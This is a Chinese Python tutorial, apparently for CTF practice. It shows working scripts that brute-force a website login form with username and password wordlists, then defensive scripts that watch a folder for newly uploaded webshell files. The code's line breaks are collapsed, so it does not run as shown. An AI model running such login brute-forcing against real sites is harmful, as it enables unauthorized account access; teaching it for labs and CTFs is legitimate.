Python从0到POC编写--实用小脚本02

爆破脚本：

爆破脚本也是我们经常使用的东西

这里就简单讲讲后台爆破脚本的编写吧

在编写之前，我们先通过访问网站去看看情况

首先我们可以先登录看看

输入账号 admin ，密码 12345 后

登录失败，提示用户名或密码错误

images

在输入正确的密码 123456 后，则会跳到用户界面

然后我们可以通过这个信息去判断是否登录成功

images

现在我们有了登录密码，有了判断是否登录成功的信息

还有就是如何构造 post 包

我们可以先用 burp 抓一下看看

现在我们可以看到，这些数据发送到了 /user/logCheck.php 的页面，

很明显这是判断用户名和密码的，

POST 数据为 user=admin&pass=123456&submit=login

images

有了这些信息，就可以写脚本了，

脚本其实跟前面的一些类似，无非就是判断不同

直接来看代码

假设我们知道用户名为 admin ，

那么我们可以直接爆破密码，

使用 format() 函数把密码传进去


# -*- coding: utf-8 -*-import requests
import time
import redef login(pwd):try:headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0","Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2"}url = "http://www.vd.com/user/logCheck.php"login = {"user":"admin","pass":"{}".format(pwd),"submit":"login"}r = requests.post(url,headers=headers,data=login)r.encoding = 'utf-8'if '用户名或密码错误' in r.text:print("用户名: " +user+ " 密码: " + pwd +" -----> 登录失败")else:print("用户名: " +user+ " 密码: " + pwd + " -----> 登录成功")except:print("用户名: " +user+ " 密码: " + pwd + " -----> 无法访问")password = open('D:/top100.txt','r')for pwd in password.readlines():pwd = pwd.strip('\n')login(pwd)username.close()

下面是运行结果

images

假设用户名也不知道，那么我们也可以连用户名也一起爆破，

给用户名也加一个 format() 就行了

下面是代码

使用 for 循环来传入用户名和密码进行爆破


import requests
import time
import redef login(user,pwd):try:headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0","Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2"}url = "http://www.vd.com/user/logCheck.php"login = {"user":"{}".format(user),"pass":"{}".format(pwd),"submit":"login"}r = requests.post(url,headers=headers,data=login)r.encoding = 'utf-8'if '用户名或密码错误' in r.text:print("用户名: " +user+ " 密码: " + pwd +" -----> 登录失败")else:print("用户名: " +user+ " 密码: " + pwd + " -----> 登录成功")except:print("用户名: " +user+ " 密码: " + pwd + " -----> 无法访问")username = open('D:/user.txt','r')for user in username.readlines():user = user.strip('\n')password = open('D:/top100.txt','r')for pwd in password.readlines():pwd = pwd.strip('\n')login(user,pwd)username.close()
password.close()

运行结果

验证完 admin 就验证 root

images

文件监控：

在ctf线下赛中，经常会遇到文件上传漏洞，

那么在我们不会修复漏洞的情况下，就会被挂马 getshell了，

然而我们即使知道上传的文件在哪里，

那么也不可能一直守着那个文件夹删除文件，

你删除也没有别人的脚本操作快，你删除时别人已经 getflag 了，

在这种情况下，我们就需要一个文件监控脚本来帮助我们去完成这个操作。

编写思路：

先获取原文件夹里的文件，做一个白名单，

然后监控是否有新增文件

方法一：

先来看看代码，编写思路是这样子的，

将要监控的文件夹复制到其他地方，当作一个白名单，

然后重复比对这两个文件夹里面的内容，

如果在白名单上没有的，那么就是新增的文件，

下面是一个纯监控脚本，如需要后续操作，比如删除，可自行添加


import os
import shutil
import timedef backup(path1,path2):global file_listif os.path.isdir(path2):  # 判断白名单文件夹是否存在file_list = os.listdir(path2)   # 白名单文件else:shutil.copytree(path1,path2)   # 将 path1 文件复制到 path2 作为白名单file_list = os.listdir(path2)  # 白名单文件def checkfile(file_list):while 1:check_file = os.listdir(path1)  # 要监控的文件夹tmp = [file for file in check_file if not file in file_list] # 列表推导式，获取差集if tmp: # 判断是否有新增文件for file in tmp:print('发现新文件 -----> ' + file)file_list.append(str(file))       # 避免重复输出else:pass# print(tmp)time.sleep(3)  # 每3秒循环一次if __name__ == '__main__':path1 = 'D:/123'  # 要监控的文件夹，123为文件夹名字path2 = 'E:/123'  # 白名单路径，123为文件夹名字backup(path1,path2)checkfile(file_list)

最后效果就是这样子的

images

除了列表推导式，我们还可以用其他方法获取差集，

那就是使用 difference() 函数，

这种方式比列表推导式更高效

代码其实都差不多，这里就不做更多的介绍了


import os
import shutil
import timedef backup(path1,path2):global file_listif os.path.isdir(path2):  # 判断白名单文件夹是否存在file_list = os.listdir(path2)   # 白名单文件else:shutil.copytree(path1,path2)   # 将 path1 文件复制到 path2 作为白名单file_list = os.listdir(path2)  # 白名单文件def checkfile(file_list):while 1:check_file = os.listdir(path1)  # 要监控的文件夹tmp = list(set(check_file).difference(set(file_list))) # 获取差集，check_file 中有，而 file_list 中没有if tmp: # 判断是否有新增文件for file in tmp:print('发现新文件 -----> ' + file)file_list.append(str(file))       # 避免重复输出else:pass# print(tmp)time.sleep(3)  # 每3秒循环一次if __name__ == '__main__':path1 = 'D:/123'  # 要监控的文件夹，123为文件夹名字path2 = 'E:/123'  # 白名单路径，123为文件夹名字backup(path1,path2)checkfile(file_list)

方法二：

方法一中复制文件夹到其他地方的方式颇为笨重，

如果要监控的目录文件非常多，那么就会非常不方便

下面这个方法，不需要复制文件夹也能实现监控效果，

在脚本第一次运行的时候获取一个初始文件列表 file_list

然后在第二次以及后面的运行中获取的文件作为 check_dir

然后再判断两个列表中是否有不相同的文件存在

脚本运行后，你往文件夹丢文件就能看到效果了，脚本默认是 3 秒检测一次。


import os
import timedef list_dir(filepath):global file_list	file_list = os.listdir(filepath)  # 获取初始文件列表，作为白名单def checkfile(filepath):while 1:check_dir = os.listdir(filepath)  # 获取路径下的文件for file in check_dir:if str(file) not in str(file_list):print('发现新文件 -----> ' + file)file_list.append(str(file))else:passtime.sleep(3)  # 3秒循环一次if __name__ == '__main__':filepath = 'D:/123'    # 要监控的目录路径，D盘下的123文件夹list_dir(filepath)checkfile(filepath)

效果呢，也是一样的

images